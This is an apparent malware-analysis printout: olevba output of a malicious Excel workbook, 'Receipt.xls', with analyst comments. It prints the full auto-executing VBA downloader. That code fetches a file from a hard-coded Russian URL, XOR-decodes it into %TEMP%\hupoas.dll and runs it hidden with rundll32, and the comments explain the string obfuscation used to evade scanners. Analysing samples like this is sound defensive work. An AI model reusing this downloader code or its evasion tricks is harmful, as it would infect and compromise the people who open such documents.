- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OpX:MASI-B- Receipt.xls
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: Receipt.xls
- Type: OpenXML
- -------------------------------------------------------------------------------
- VBA MACRO ЭтаКнига.cls
- in file: xl/vbaProject.bin - OLE stream: u'VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Auto-exec entry point in the ThisWorkbook stream (olevba AutoExec: Workbook_Open).
- ' Runs as soon as the workbook is opened and hands control to ItNinja in Module3.
- ' The "ASDEX" argument is never read: ItNinja exits before the only code that uses it.
- Sub Workbook_Open()
- ItNinja "ASDEX"
- End Sub
- ' Not referenced by any other routine on this page; reads as terminal-emulator
- ' screen-scraping code (EMReadS.creen) pasted in as filler rather than part of the
- ' Workbook_Open chain.
- Function copy_screen_to_array(output_array)
- output_array = ""
- Dim screenarray(23)
- Row = 1
- ' 24 iterations; reading_line is never assigned in visible code, so presumably it is
- ' filled by EMReadS.creen - cannot be confirmed from this listing.
- For Each Line In screenarray
- EMReadS.creen reading_line, 80, Row, 1
- ' Each line is appended with the marker "UUDDLRLRBA", then the marker is used to split.
- output_array = output_array & reading_line & "UUDDLRLRBA"
- Row = Row + 1
- Next
- ' Result is written to the argument, not to the function's return value.
- output_array = Split(output_array, "UUDDLRLRBA")
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+---------------+----------------------------------------+
- | Type | Keyword | Description |
- +----------+---------------+----------------------------------------+
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- +----------+---------------+----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Лист1.cls
- in file: xl/vbaProject.bin - OLE stream: u'VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: xl/vbaProject.bin - OLE stream: u'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Module-level state shared by the stages below. Names are random-looking; what each
- ' holds is taken from where it is assigned on this page:
- ' moyaMANUNADAcdaw   - XMLHTTP request object (created in ClearString)
- Public moyaMANUNADAcdaw As Object
- ' moyaMANUNAra12dv34 - ADODB.Stream that receives the HTTP response (GetResulOfMyResult)
- Public moyaMANUNAra12dv34 As Object
- ' moyaMANUNAKSKLAL   - WScript.Shell Environment("Process") collection (ToDBDateTime)
- Public moyaMANUNAKSKLAL As Object
- ' moyaMANUNALAKOPPC  - value of %TEMP% (TlfFormat)
- Public moyaMANUNALAKOPPC As String
- ' moyaMANUNAPLdunay  - decoded string table, Split on "JIIIINX" (GetCurrentFolder)
- Public moyaMANUNAPLdunay() As String
- ' moyaMANUNAUUUKA    - %TEMP%\hupoas.dll, the decoded payload path (TlfFormat)
- Public moyaMANUNAUUUKA As String
- ' moyaMANUNAUUUKABBB - %TEMP%\hrushki, the raw download path (TlfFormat)
- Public moyaMANUNAUUUKABBB As String
- ' moyaMANUNAGMAKO    - Shell.Application object; created in GetResulOfMyResult, never used after
- Public moyaMANUNAGMAKO As Object
- ' moyaMANUNA4        - download URL (VerCadenaPermiso)
- Public moyaMANUNA4 As String
- ' moyaMANUNA2        - obfuscated string table before decoding (ItNinja)
- Public moyaMANUNA2 As String
- ' moyaMANUNAASALLLP  - raw HTTP response body (moyaMANUNAacheha)
- Public moyaMANUNAASALLLP As Variant
- ' Request header name used in VerCadenaPermiso.
- Public Const moyaMANUNARH = "User-Agent"
- ' Middle fragment of the method name "sav" + "etofi" + "le" = "savetofile" (TlfFormat).
- Public Const RACHEL = "etofi"
- ' Two-mode stage function; the phone-number formatting that gives it its name is
- ' unreachable. dilodan=True (called from VerCadenaPermiso): resolve the drop paths
- ' under %TEMP% and exit. dilodan=False (called from ReadResult): jump straight to
- ' VarPupka, i.e. save the downloaded bytes, XOR-decode them and launch the result.
- ' Index meanings for moyaMANUNAPLdunay follow from the Replace/Split calls in
- ' ItNinja, GetResulOfMyResult and GetCurrentFolder (6 = "TEMP", 12 = "\hupoas.dll").
- Public Function TlfFormat(ByVal tlfNr As String, dilodan As Boolean) As String
- Dim tmp As String
- Dim i As Long
- If dilodan Then
- ' moyaMANUNAKSKLAL is the WScript.Shell Environment("Process") collection set in
- ' ToDBDateTime, so this reads the %TEMP% variable.
- moyaMANUNALAKOPPC = moyaMANUNAKSKLAL(moyaMANUNAPLdunay(6))
- moyaMANUNAUUUKA = moyaMANUNALAKOPPC
- ' Raw download lands in %TEMP%\hrushki ...
- moyaMANUNAUUUKABBB = moyaMANUNAUUUKA + "\hrushki"
- ' ... and the decoded payload in %TEMP%\hupoas.dll.
- moyaMANUNAUUUKA = moyaMANUNAUUUKA + moyaMANUNAPLdunay(12)
- Exit Function
- Else
- GoTo VarPupka
- End If
- ' Dead code from here to the VarPupka label: neither branch above falls through.
- restart:
- For i = 1 To Len(tlfNr)
- If Mid$(tlfNr, i, 1) = " " Then
- tlfNr = Mid$(tlfNr, 1, i - 1) & Mid$(tlfNr, i + 1)
- GoTo restart
- End If
- Next i
- For i = 1 To Len(tlfNr)
- tmp = tmp & Mid$(tlfNr, i, 1)
- If i = 2 Or i = 4 Or i = 6 Or i = 8 Or i = 10 Then
- tmp = tmp & " "
- End If
- Next i
- TlfFormat = tmp
- VarPupka:
- ' "sav" + RACHEL + "le" = "savetofile"; 14 / 7 = 2 = adSaveCreateOverWrite. Writes the
- ' ADODB.Stream (filled by ReadResult) to %TEMP%\hrushki. CallByName keeps the method
- ' name out of the static keyword scan, which olevba flags for exactly that reason.
- CallByName moyaMANUNAra12dv34, "sav" + RACHEL + "le", VbMethod, moyaMANUNAUUUKABBB, 14 / 7
- ' Repeating-key XOR of %TEMP%\hrushki into %TEMP%\hupoas.dll with the literal key.
- SaveAllStufAndExit moyaMANUNAUUUKABBB, moyaMANUNAUUUKA, "S2CsMgS5Y9WxzevdSUrPqUiTwI69FbRq"
- ' "rund" & "ll32.exe" splits the executable name so "rundll32" is never one literal
- ' (olevba still catches the "ll32.exe" fragment as an IOC). Loads the decoded DLL via
- ' its export "qwerty" in a hidden window.
- Call Shell("rund" & "ll32.exe " & moyaMANUNAUUUKA & ",qwerty", vbHide)
- End Function
- ' Filler lifted from a WScript/WMIEXEC-style helper: regEx, Matches, Command and
- ' WAITTIME are all undeclared here, WScript is the Windows Script Host object (not
- ' available inside Excel VBA), and nothing on this page calls PhraseCmd.
- Function PhraseCmd(cmd)
- regEx.IgnoreCase = True
- Set Matches = regEx.Execute(cmd)
- If Matches.Count <> 0 Then
- Set objMatch = Matches(0)
- Command = objMatch.SubMatches(0)
- WAITTIME = CInt(objMatch.SubMatches(1))
- WScript.Echo "WMIEXEC : Waiting " & WAITTIME & " ms..." & vbNewLine
- End If
- ' Second pass looks for a "-persist" suffix and reports it through the return value.
- regEx.Pattern = "(.*?)-persist"
- regEx.IgnoreCase = True
- Set Matches = regEx.Execute(cmd)
- If Matches.Count <> 0 Then
- Set objMatch = Matches(0)
- Command = objMatch.SubMatches(0)
- PhraseCmd = "persist"
- End If
- End Function
- ' Filler from the same WMIEXEC-style script as PhraseCmd/DeleteShare: objWMIService
- ' and FilePath are undeclared, WScript is not defined inside Excel VBA, and no routine
- ' on this page calls CreateShare. Kept here only because it is in the sample.
- Function CreateShare()
- Set objNewShare = objWMIService.Get("Win32_Share")
- ' Win32_Share.Create(Path, Name, Type, MaximumAllowed, Description).
- intReturn = objNewShare.Create _
- (FilePath, "WMI_SHARE", 0, 25, "")
- If intReturn <> 0 Then
- WScript.Echo "WMIEXEC ERROR: Share could not be created." & _
- vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
- Select Case intReturn
- Case 2
- WScript.Echo "WMIEXEC ERROR: Access Denied!"
- Case 9
- WScript.Echo "WMIEXEC ERROR: Invalid File Path!"
- Case 22
- WScript.Echo "WMIEXEC ERROR: Share Name Already In Used!"
- Case 24
- WScript.Echo "WMIEXEC ERROR: Directory NOT exists!"
- End Select
- ' "Already in use" (22) is tolerated; every other failure terminates the script.
- If intReturn <> 22 Then WScript.Quit 1
- Else
- WScript.Echo "WMIEXEC : Share created sucess."
- WScript.Echo "WMIEXEC : Share Name -> WMI_SHARE"
- WScript.Echo "WMIEXEC : Share Path -> " & FilePath
- End If
- End Function
- ' Thin wrapper around Replace: CH1 with every CH2 replaced by CH3. This is the
- ' deobfuscation primitive used by ItNinja, GetResulOfMyResult and GetCurrentFolder
- ' to turn "=CH", "-E" and "*P" back into "M", "e" and "s".
- Public Function GodnTeBabenParama(CH1 As String, CH2 As String, CH3 As String) As String
- GodnTeBabenParama = Replace(CH1, CH2, CH3)
- End Function
- ' Prepares the ADODB.Stream (moyaMANUNAra12dv34) for binary data. The Usuarios/SQL
- ' lookup after Exit Function, which the name refers to, is unreachable.
- Public Function NombreUsuario() As String
- Dim SQL As String
- ' 0 + 0 + 1 = 1 = adTypeBinary, spelled as a sum so the literal 1 is not visible.
- moyaMANUNAra12dv34.Type = 0 + 0 + 1
- moyaMANUNAra12dv34.Open
- Exit Function
- ' Dead code: IdUsuario and RsUsuario are undeclared; return value is always "".
- SQL = "Select * from Usuarios WHERE usu_id=" & IdUsuario
- If Not RsUsuario.EOF Then
- NombreUsuario = RsUsuario!usu_apodo
- End If
- End Function
- ' Filler from the WMIEXEC-style script (see CreateShare): colShares is undeclared,
- ' WScript is not defined inside Excel VBA, and nothing on this page calls DeleteShare.
- Function DeleteShare()
- ' Only the last Delete return value survives the loop.
- For Each objShare In colShares
- intReturn = objShare.Delete
- Next
- If intReturn <> 0 Then
- WScript.Echo "WMIEXEC ERROR: Delete Share failed." & _
- vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
- Select Case intReturn
- Case 2
- WScript.Echo "WMIEXEC ERROR: Access Denied!"
- Case 25
- WScript.Echo "WMIEXEC ERROR: Share Not Exists!"
- End Select
- Else
- WScript.Echo "WMIEXEC : Share deleted sucess."
- End If
- End Function
- ' Resolves the process environment and continues the chain. The parameter is passed
- ' on unchanged and VerCadenaPermiso never reads it before its Exit Sub, so the
- ' date/time name is decoration. Called from ClearString with "".
- Public Function ToDBDateTime(ByVal ddmmyyhhmmDateTime As String) As String
- ' moyaMANUNAPLdunay(3) = "WScript.Shell" (decoded table, see ItNinja); the object is
- ' held in an undeclared local.
- Set moyaMANUNA1DASH1solo = CreateObject(moyaMANUNAPLdunay(3))
- ' 2 + 2 = 4 -> "Process": the Environment("Process") collection, read later by
- ' TlfFormat to get %TEMP%.
- Set moyaMANUNAKSKLAL = moyaMANUNA1DASH1solo.Environment(moyaMANUNAPLdunay(2 + 2))
- ' Next stage: the HTTP download.
- VerCadenaPermiso ddmmyyhhmmDateTime
- End Function
- ' In-place repeating-key XOR over the whole buffer. Called from SaveAllStufAndExit with
- ' the bytes of %TEMP%\hrushki and the 32-character literal key passed in from
- ' TlfFormat. The transform is its own inverse, which is how an analyst recovers the
- ' payload from a captured hrushki file.
- Public Sub DecryptByte(ByteArray() As Byte, Key As String)
- Dim offset As Long
- Dim ByteLen As Long
- Dim ResultLen As Long
- Dim CurrPercent As Long
- Dim NextPercent As Long
- Dim m_Key() As Byte
- Dim m_KeyLen As Long
- m_KeyLen = Len(Key)
- ' The ReDim is immediately replaced by the StrConv assignment below.
- ReDim m_Key(m_KeyLen)
- ' Key as a one-byte-per-character byte array.
- m_Key = StrConv(Key, vbFromUnicode)
- ByteLen = UBound(ByteArray) + 1
- ResultLen = ByteLen
- For offset = 0 To (ByteLen - 1)
- ' Key index wraps with Mod; an empty Key makes this Mod 0 and raises a runtime error.
- ByteArray(offset) = ByteArray(offset) Xor m_Key(offset Mod m_KeyLen)
- ' Leftover progress-percentage bookkeeping from whatever routine this was lifted
- ' from; CurrPercent/NextPercent are never reported or used elsewhere.
- If (offset >= NextPercent) Then
- CurrPercent = Int((offset / ResultLen) * 100)
- NextPercent = (ResultLen * ((CurrPercent + 1) / 100)) + 1
- End If
- Next
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | CallByName | May attempt to obfuscate malicious |
- | | | function calls |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | vbHide | May run an executable file or a system |
- | | | command |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | ll32.exe | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: xl/vbaProject.bin - OLE stream: u'VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' The download stage. Everything after Exit Sub (the A/B/M/C permission-flag parser
- ' the name refers to) is unreachable; Alta, Baja and modi are undeclared.
- Public Sub VerCadenaPermiso(permiso As String)
- Dim i As Long
- Dim letra As String
- Alta = False
- Baja = False
- modi = False
- Dim Consu As Boolean
- Consu = True
- ' Hard-coded download URL; this is the IOC olevba lists for Module2.
- moyaMANUNA4 = "http://opmsk.ru/g76ub76"
- ' Host check: Application's default property is its Name, "Microsoft Excel" when the
- ' macro runs inside Excel. In any other host nothing below executes.
- If Application = "Microsoft Excel" Then
- ' moyaMANUNADAcdaw is the XMLHTTP object from ClearString; moyaMANUNAPLdunay(5) = "GET";
- ' False = synchronous request.
- moyaMANUNADAcdaw.Open moyaMANUNAPLdunay(5), moyaMANUNA4, False
- ' Fixed User-Agent (moyaMANUNARH = "User-Agent"). "Windows NT 5.5" is not a version any
- ' Windows build reports, so the full string is a useful network-detection pivot.
- moyaMANUNADAcdaw.setRequestHeader moyaMANUNARH, "Mozilla/4.5 (compatible; MSIE 6.5; Windows NT 5.5)"
- moyaMANUNADAcdaw.Send
- ' letra is still "" here; True selects TlfFormat's path-resolution branch
- ' (%TEMP%\hrushki and %TEMP%\hupoas.dll).
- TlfFormat letra, True
- ' Sets the ADODB.Stream to binary and opens it.
- NombreUsuario
- ' Reads responseBody and continues to ReadResult (save, XOR-decode, rundll32).
- moyaMANUNAacheha letra
- End If
- Exit Sub
- ' Dead code from here to End Sub.
- For i = 1 To Len(permiso)
- letra = Mid(permiso, i, 1)
- If letra = "A" Then
- Alta = True
- End If
- If letra = "B" Then
- Baja = True
- End If
- If letra = "M" Then
- modi = True
- End If
- If letra = "C" Then
- Consu = True
- End If
- Next i
- If Len(permiso) = 0 Then
- Consu = False
- modi = False
- Alta = False
- Baja = False
- End If
- End Sub
- ' Second deobfuscation step and COM object creation. Called from ItNinja with "-";
- ' Cadena is never read and the return value is always "".
- Public Function GetResulOfMyResult(ByVal Cadena As String) As String
- ' "=CH" -> "M" in the string table built by ItNinja.
- moyaMANUNA2 = GodnTeBabenParama(moyaMANUNA2, "=CH", "M")
- ' "*P" -> "s", then Split on "JIIIINX" into moyaMANUNAPLdunay.
- GetCurrentFolder
- ' moyaMANUNAPLdunay(1) = "Adodb.Stream": receives the HTTP body (see ReadResult).
- Set moyaMANUNAra12dv34 = CreateObject(moyaMANUNAPLdunay(1))
- ' 5 - 3 = 2 -> "Shell.Application"; created but never used on this page.
- Set moyaMANUNAGMAKO = CreateObject(moyaMANUNAPLdunay(5 - 3))
- ' Next stage: creates the XMLHTTP object.
- ClearString ""
- End Function
- ' Grabs the downloaded bytes and continues to ReadResult. The GoTo skips the
- ' time/Rnd-based position arithmetic between it and the beyTumba label, so pass is
- ' never read and the return value is always "". (The skipped Dim statements are
- ' compile-time declarations, so jumping over them has no runtime effect.)
- Public Function moyaMANUNAacheha(pass As String) As String
- Dim temp As String
- Dim moyaMANUNAtum As String
- GoTo beyTumba
- ' Dead code from here to the beyTumba label.
- Dim pos As Long
- Dim leng As Long
- Dim tim As Variant
- Dim i As Long
- Dim Key As Long
- leng = Len(pass)
- tim = Mid(Time, 1, 8)
- tim = Mid(tim, 1, Len(tim) - 3)
- tim = Mid(tim, Len(tim) - 1, 2) * Int(Rnd * 100)
- For i = 1 To Len(CStr(tim))
- pos = pos + CInt(Mid(CStr(tim), i, 1))
- Next
- While pos > Len(pass)
- pos = pos Mod 10 + Int(Rnd * 10)
- If pos = 0 Then
- pos = Len(pass) + 1
- End If
- Wend
- beyTumba:
- ' Raw response body of the GET issued in VerCadenaPermiso (moyaMANUNADAcdaw is the
- ' XMLHTTP object).
- moyaMANUNAASALLLP = moyaMANUNADAcdaw.responseBody
- ReadResult
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Windows | May enumerate application windows (if |
- | | | combined with Shell.Application object) |
- | IOC | http://opmsk.ru/g76u | URL |
- | | b76 | |
- +------------+----------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: xl/vbaProject.bin - OLE stream: u'VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Copies the HTTP response into the ADODB.Stream and moves to the save/decode/run
- ' stage. The UNC-share read between GoTo pid7 and the pid7 label is skipped.
- Public Function ReadResult()
- ' moyaMANUNAASALLLP holds responseBody (set in moyaMANUNAacheha); the stream was
- ' set to binary (Type = 1) and opened in NombreUsuario.
- moyaMANUNAra12dv34.Write moyaMANUNAASALLLP
- GoTo pid7
- ' Dead code: WMIEXEC-style result collection over \\host\WMI_SHARE. WAITTIME, host,
- ' Filename, file and exe are undeclared and the block is never reached.
- WScript.Sleep (WAITTIME)
- UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & Filename
- Set fso = CreateObject("Scripting.FileSystemObject")
- Set objFile = fso.OpenTextFile(UNCFilePath, 1)
- If Not objFile.AtEndOfStream Then strContents = objFile.ReadAll
- objFile.Close
- WScript.Echo strContents
- strDelFile = "del " & file & " /F"
- exe.c strDelFile, "nul"
- pid7:
- ' dilodan=False makes TlfFormat jump to its VarPupka label: SaveToFile to
- ' %TEMP%\hrushki, XOR-decode to %TEMP%\hupoas.dll, run it with rundll32.
- TlfFormat "", False
- End Function
- ' Final deobfuscation step: "*P" -> "s" and Split on "JIIIINX" into the global
- ' string table. The UNC-share read between GoTo mig5 and the label is skipped and
- ' the function's own return value is never set on the live path.
- Public Function GetCurrentFolder()
- ' LCase("S") = "s"; written this way so the lower-case letter is not a literal.
- moyaMANUNA2 = GodnTeBabenParama(moyaMANUNA2, "*P", LCase("S"))
- GoTo mig5
- ' Dead code: same WMIEXEC-style fragment as in ReadResult; host, Filename, file,
- ' exe and WAITTIME are undeclared here.
- WScript.Sleep (WAITTIME)
- UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & Filename
- Set fso = CreateObject("Scripting.FileSystemObject")
- Set objFile = fso.OpenTextFile(UNCFilePath, 1)
- GetCurrentFolder = objFile.ReadLine
- objFile.Close
- strDelFile = "del " & file & " /F"
- exe.c strDelFile, "nul"
- mig5:
- ' After ItNinja ("-E" -> "e") and GetResulOfMyResult ("=CH" -> "M") this yields
- ' ProgIDs, method names, "GET", "TEMP" and "\hupoas.dll" at fixed indexes (listed
- ' in ItNinja's header comment).
- moyaMANUNAPLdunay = Split(moyaMANUNA2, "JIIIINX")
- End Function
- ' Creates the XMLHTTP object and continues the chain. The loop body runs twice:
- ' Len(Trim("Reika")) = 5, d is True on i = 1 and False on i = 2, where
- ' moyaMANUNAPLdunay(i - 2) = moyaMANUNAPLdunay(0) = "Microsoft.XMLHTTP" is created
- ' and the loop exits. inOrigString is never read and the function always returns
- ' "" because Exit Function precedes the only assignment to the return value.
- Public Function ClearString(ByRef inOrigString As String) As String
- Dim strNewString As String
- Dim sChar As String
- Dim i As Integer
- Dim d As Boolean
- d = True
- ' IsWord is undeclared and never read.
- IsWord = True
- For i = 1 To Len(Trim("Reika"))
- If d = False Then
- Set moyaMANUNADAcdaw = CreateObject(moyaMANUNAPLdunay(i - 2))
- Exit For
- Else
- d = False
- End If
- Next i
- ' Next stage: WScript.Shell / Environment("Process"), then the download.
- ToDBDateTime ""
- Exit Function
- ' Dead code from here to End Function: terminal-emulator and Excel report-building
- ' fragments (dotted names such as check_fo.r_MAXIS and EMWri.teScreen are
- ' undeclared here).
- Call check_fo.r_MAXIS(False)
- Call navigate_t.o_MAXIS_screen("POLI", "____")
- EMWri.teScreen "TEMP", 5, 40
- EMWri.teScreen "TABLE", 21, 71
- trans.mit
- Set objExcel = CreateObject("Excel.Application")
- objExcel.Visible = True
- Set objWorkbook = objExcel.Workbooks.Add()
- objExcel.DisplayAlerts = True
- objExcel.Cells(1, 1).Value = "TITLE"
- objExcel.Cells(1, 2).Value = "SECTION"
- objExcel.Cells(1, 3).Value = "REVISED"
- For i = 1 To 3
- objExcel.Cells(1, i).Font.Bold = True
- Next
- ClearString = strNewString
- End Function
- ' Reads SourceFile whole, XOR-decodes it in memory with Key (DecryptByte) and writes
- ' the result to DestFile. Called from TlfFormat with %TEMP%\hrushki, %TEMP%\hupoas.dll
- ' and the literal 32-character key; the decoded file is what rundll32 loads next.
- Public Sub SaveAllStufAndExit(SourceFile As String, DestFile As String, Optional Key As String)
- Dim libhercen As Integer
- Dim ByteArray() As Byte
- libhercen = FreeFile
- Open SourceFile For Binary As #libhercen
- ' Sized to the file length; a zero-length download makes this ReDim(0 To -1) and
- ' raises a runtime error, so an empty response never produces a DLL.
- ReDim ByteArray(0 To LOF(libhercen) - 1)
- Get #libhercen, , ByteArray()
- Close #libhercen
- ' Key is Optional with no default; omitted it would be "" and DecryptByte would
- ' fail on Mod 0 - every caller on this page passes it.
- Call DecryptByte(ByteArray(), Key)
- libhercen = FreeFile
- Open DestFile For Binary As #libhercen
- Put #libhercen, , ByteArray()
- Close #libhercen
- End Sub
- ' First stage after Workbook_Open. Builds the obfuscated string table in moyaMANUNA2:
- ' tokens "=CH", "-E" and "*P" stand for "M", "e" and "s", "FILMABO" is expanded here,
- ' and "JIIIINX" separates entries. After the three Replace calls (here, in
- ' GetResulOfMyResult and GetCurrentFolder) and the Split, the table reads:
- ' 0 Microsoft.XMLHTTP  1 Adodb.Stream  2 Shell.Application  3 WScript.Shell
- ' 4 Process  5 GET  6 TEMP  7 Type  8 open  9 write  10 responseBody
- ' 11 savetofile  12 \hupoas.dll
- ' The GUID-bracing code after Exit Function is never reached, so inGUID is unused
- ' and the function returns "".
- Public Function ItNinja(ByRef inGUID As String) As String
- moyaMANUNA2 = "=CHicro*Poft.X=CHLHTTPJIIIINXAdodb.*Ptr-Ea=CHJIIIINX*Ph-Ell.Ap"
- ' "FILMABO" -> "-EJIIIINXr-E*P" turns "writFILMABOpon*P-EBody" into the two entries
- ' "write" and "responseBody".
- moyaMANUNA2 = moyaMANUNA2 + GodnTeBabenParama("plicationJIIIINXW*Pcript.*Ph-EllJIIIINXProc-E*P*PJIIIINXG-ETJIIIINXT-E=CHPJIIIINXTyp-EJIIIINXop-EnJIIIINXwritFILMABOpon*P-EBodyJIIIINX*Pav-Etofil-EJIIIINX", "FILMABO", "-EJIIIINXr-E*P")
- ' Appends the payload file name and applies "-E" -> "e" (olevba's "P.dll" IOC is the
- ' still-encoded "\hupoa*P.dll").
- moyaMANUNA2 = GodnTeBabenParama(moyaMANUNA2 + "\hupoa*P.dll", "-E", "e")
- ' Next stage: remaining replacements, Split, COM object creation.
- GetResulOfMyResult "-"
- Exit Function
- ' Dead code from here to End Function.
- If Mid$(inGUID, 1, 1) <> "{" Then
- ItNinja = "{" & inGUID & "}"
- Else
- ItNinja = inGUID
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | P.dll | Executable file name |
- +------------+----------------+-----------------------------------------+